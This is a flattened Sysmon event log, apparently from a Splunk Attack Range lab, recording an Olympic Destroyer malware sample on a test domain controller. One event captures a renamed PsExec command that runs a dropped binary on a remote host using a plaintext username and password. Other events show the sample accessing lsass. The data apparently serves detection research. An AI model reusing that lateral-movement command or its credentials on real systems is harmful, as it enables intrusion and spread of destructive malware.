Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014519AE3CA444F7FEF5FC4D0F79BE98,SHA256=3F2AD4CFF3DF84CF2A5D5876DCC00590400D7E5BCA2BE36DD09198843FF79B95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.796{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E805-000000003802}4320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.780{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E805-000000003802}4320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31F788CCB54549FDD3A29D819714AE2,SHA256=25983625C0CBB0B8CB5F5133321D1D1515F1FFC35F7AF732A1976FE90C5C7C00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.733{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.733{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.733{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.733{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.649{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92D1C26C0D6352A8A9D79FE7ADAE57F,SHA256=364B19B1640C8C31E182E9689E7013403141DC36183AED268F98C93AB8FAD37E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.649{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.649{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.655{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.649{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.633{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:03.616{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.548{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E605-000000003802}1120C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.548{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E605-000000003802}1120C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.533{C8EA50B7-12FF-6216-E605-000000003802}11205960C:\Windows\system32\conhost.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.494{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E605-000000003802}1120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.479{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E605-000000003802}1120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.448{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.448{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.448{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.448{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.348{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.332{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 